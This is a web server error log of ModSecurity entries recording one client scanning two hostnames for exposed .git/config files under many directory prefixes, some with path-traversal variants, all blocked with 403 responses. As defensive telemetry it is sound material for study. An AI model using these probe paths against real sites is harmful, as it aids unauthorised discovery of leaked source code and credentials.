[Sun Nov 17 23:56:41.934629 2024] [:error] [pid 3372501] [client 179.43.189.138:55506] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/shared/.git/config"] [unique_id "Zzp0qcPhACgxtlj_6Rz5dAAAABY"]
[Sun Nov 17 23:56:41.934794 2024] [:error] [pid 3372501] [client 179.43.189.138:55506] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/shared/.git/config"] [unique_id "Zzp0qcPhACgxtlj_6Rz5dAAAABY"]
[Sun Nov 17 23:56:41.937121 2024] [:error] [pid 3372499] [client 179.43.189.138:55516] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /common/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/common/.git/config"] [unique_id "Zzp0qTQl9SjVY23u354zdgAAABQ"]
[Sun Nov 17 23:56:41.937307 2024] [:error] [pid 3372499] [client 179.43.189.138:55516] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/common/.git/config"] [unique_id "Zzp0qTQl9SjVY23u354zdgAAABQ"]
[Sun Nov 17 23:56:41.937512 2024] [:error] [pid 3372499] [client 179.43.189.138:55516] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/common/.git/config"] [unique_id "Zzp0qTQl9SjVY23u354zdgAAABQ"]
[Sun Nov 17 23:56:41.939660 2024] [:error] [pid 3370338] [client 179.43.189.138:55530] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /cache/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cache/.git/config"] [unique_id "Zzp0qYtN8Fx1_F3WiUqMaAAAAAc"]
[Sun Nov 17 23:56:41.939949 2024] [:error] [pid 3370338] [client 179.43.189.138:55530] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cache/.git/config"] [unique_id "Zzp0qYtN8Fx1_F3WiUqMaAAAAAc"]
[Sun Nov 17 23:56:41.940140 2024] [:error] [pid 3370338] [client 179.43.189.138:55530] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cache/.git/config"] [unique_id "Zzp0qYtN8Fx1_F3WiUqMaAAAAAc"]
[Sun Nov 17 23:56:41.949554 2024] [:error] [pid 3386431] [client 179.43.189.138:55534] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /dist/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/dist/.git/config"] [unique_id "Zzp0qUsENrDzGr7aL2wm7AAAAAg"]
[Sun Nov 17 23:56:41.949828 2024] [:error] [pid 3386431] [client 179.43.189.138:55534] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/dist/.git/config"] [unique_id "Zzp0qUsENrDzGr7aL2wm7AAAAAg"]
[Sun Nov 17 23:56:41.950040 2024] [:error] [pid 3386431] [client 179.43.189.138:55534] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/dist/.git/config"] [unique_id "Zzp0qUsENrDzGr7aL2wm7AAAAAg"]
[Sun Nov 17 23:56:41.952363 2024] [:error] [pid 3372496] [client 179.43.189.138:55546] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /env/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/env/.git/config"] [unique_id "Zzp0qRWQPpYJ_QjvKbg8hgAAABA"]
[Sun Nov 17 23:56:41.952579 2024] [:error] [pid 3372496] [client 179.43.189.138:55546] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/env/.git/config"] [unique_id "Zzp0qRWQPpYJ_QjvKbg8hgAAABA"]
[Sun Nov 17 23:56:41.952765 2024] [:error] [pid 3372496] [client 179.43.189.138:55546] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/env/.git/config"] [unique_id "Zzp0qRWQPpYJ_QjvKbg8hgAAABA"]
[Sun Nov 17 23:56:43.203181 2024] [:error] [pid 3372498] [client 179.43.189.138:55552] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/content../.git/config"] [unique_id "Zzp0q_3-4Zu06LNKtEFVawAAABM"]
[Sun Nov 17 23:56:43.203548 2024] [:error] [pid 3372498] [client 179.43.189.138:55552] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/content../.git/config"] [unique_id "Zzp0q_3-4Zu06LNKtEFVawAAABM"]
[Sun Nov 17 23:56:43.203763 2024] [:error] [pid 3372498] [client 179.43.189.138:55552] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/content../.git/config"] [unique_id "Zzp0q_3-4Zu06LNKtEFVawAAABM"]
[Sun Nov 17 23:56:43.205630 2024] [:error] [pid 3372500] [client 179.43.189.138:55572] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/media../.git/config"] [unique_id "Zzp0qyXNrulCFj7TKS97IwAAABU"]
[Sun Nov 17 23:56:43.205634 2024] [:error] [pid 3386427] [client 179.43.189.138:55568] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/img../.git/config"] [unique_id "Zzp0qw5EWeoyGe8h9FctMQAAAAI"]
[Sun Nov 17 23:56:43.205943 2024] [:error] [pid 3372500] [client 179.43.189.138:55572] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/media../.git/config"] [unique_id "Zzp0qyXNrulCFj7TKS97IwAAABU"]
[Sun Nov 17 23:56:43.206129 2024] [:error] [pid 3372500] [client 179.43.189.138:55572] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/media../.git/config"] [unique_id "Zzp0qyXNrulCFj7TKS97IwAAABU"]
[Sun Nov 17 23:56:43.206285 2024] [:error] [pid 3386427] [client 179.43.189.138:55568] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/img../.git/config"] [unique_id "Zzp0qw5EWeoyGe8h9FctMQAAAAI"]
[Sun Nov 17 23:56:43.206716 2024] [:error] [pid 3386427] [client 179.43.189.138:55568] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/img../.git/config"] [unique_id "Zzp0qw5EWeoyGe8h9FctMQAAAAI"]
[Sun Nov 17 23:56:43.209297 2024] [:error] [pid 3368396] [client 179.43.189.138:55580] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/images../.git/config"] [unique_id "Zzp0qzXg56NcKc-8l0FIDAAAAAU"]
[Sun Nov 17 23:56:43.209601 2024] [:error] [pid 3368396] [client 179.43.189.138:55580] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/images../.git/config"] [unique_id "Zzp0qzXg56NcKc-8l0FIDAAAAAU"]
[Sun Nov 17 23:56:43.209787 2024] [:error] [pid 3368396] [client 179.43.189.138:55580] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/images../.git/config"] [unique_id "Zzp0qzXg56NcKc-8l0FIDAAAAAU"]
[Sun Nov 17 23:56:43.211541 2024] [:error] [pid 3372501] [client 179.43.189.138:55596] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lib../.git/config"] [unique_id "Zzp0q8PhACgxtlj_6Rz5dQAAABY"]
[Sun Nov 17 23:56:43.211910 2024] [:error] [pid 3372501] [client 179.43.189.138:55596] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lib../.git/config"] [unique_id "Zzp0q8PhACgxtlj_6Rz5dQAAABY"]
[Sun Nov 17 23:56:43.212119 2024] [:error] [pid 3372501] [client 179.43.189.138:55596] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lib../.git/config"] [unique_id "Zzp0q8PhACgxtlj_6Rz5dQAAABY"]
[Sun Nov 17 23:56:43.213904 2024] [:error] [pid 3370338] [client 179.43.189.138:55604] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/events../.git/config"] [unique_id "Zzp0q4tN8Fx1_F3WiUqMaQAAAAc"]
[Sun Nov 17 23:56:43.214293 2024] [:error] [pid 3370338] [client 179.43.189.138:55604] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/events../.git/config"] [unique_id "Zzp0q4tN8Fx1_F3WiUqMaQAAAAc"]
[Sun Nov 17 23:56:43.214592 2024] [:error] [pid 3370338] [client 179.43.189.138:55604] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/events../.git/config"] [unique_id "Zzp0q4tN8Fx1_F3WiUqMaQAAAAc"]
[Sun Nov 17 23:56:43.215410 2024] [:error] [pid 3372499] [client 179.43.189.138:55618] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/js../.git/config"] [unique_id "Zzp0qzQl9SjVY23u354zdwAAABQ"]
[Sun Nov 17 23:56:43.215727 2024] [:error] [pid 3386431] [client 179.43.189.138:55622] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/static../.git/config"] [unique_id "Zzp0q0sENrDzGr7aL2wm7QAAAAg"]
[Sun Nov 17 23:56:43.215789 2024] [:error] [pid 3372499] [client 179.43.189.138:55618] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/js../.git/config"] [unique_id "Zzp0qzQl9SjVY23u354zdwAAABQ"]
[Sun Nov 17 23:56:43.216044 2024] [:error] [pid 3386431] [client 179.43.189.138:55622] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/static../.git/config"] [unique_id "Zzp0q0sENrDzGr7aL2wm7QAAAAg"]
[Sun Nov 17 23:56:43.216059 2024] [:error] [pid 3372499] [client 179.43.189.138:55618] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/js../.git/config"] [unique_id "Zzp0qzQl9SjVY23u354zdwAAABQ"]
[Sun Nov 17 23:56:43.216236 2024] [:error] [pid 3386431] [client 179.43.189.138:55622] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/static../.git/config"] [unique_id "Zzp0q0sENrDzGr7aL2wm7QAAAAg"]
[Sun Nov 17 23:56:43.237971 2024] [:error] [pid 3372496] [client 179.43.189.138:55624] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /js/libs/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/js/libs/.git/config"] [unique_id "Zzp0qxWQPpYJ_QjvKbg8hwAAABA"]
[Sun Nov 17 23:56:43.238355 2024] [:error] [pid 3372496] [client 179.43.189.138:55624] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/js/libs/.git/config"] [unique_id "Zzp0qxWQPpYJ_QjvKbg8hwAAABA"]
